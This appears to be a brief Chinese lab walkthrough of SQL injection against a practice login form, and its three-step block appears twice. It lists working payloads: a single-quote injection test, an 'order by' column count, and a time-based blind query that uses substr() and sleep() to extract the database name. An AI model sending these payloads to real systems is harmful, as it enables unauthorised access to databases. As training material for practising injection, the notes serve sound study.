判断是单引号字符型注入:
uname=admin'#&passwd=&submit=Submit
判断列数:
uname=admin'+order+by+2#&passwd=&submit=Submit
通过substr()函数去盲注,后面的操作也是:
uname=admin'%20or%20if(substr(database(),1,1)>'a',sleep(5),1)#&passwd=&submit=Submit
判断是单引号字符型注入:
uname=admin'#&passwd=&submit=Submit
判断列数:
uname=admin'+order+by+2#&passwd=&submit=Submit
通过substr()函数去盲注,后面的操作也是:
uname=admin'%20or%20if(substr(database(),1,1)>'a',sleep(5),1)#&passwd=&submit=Submit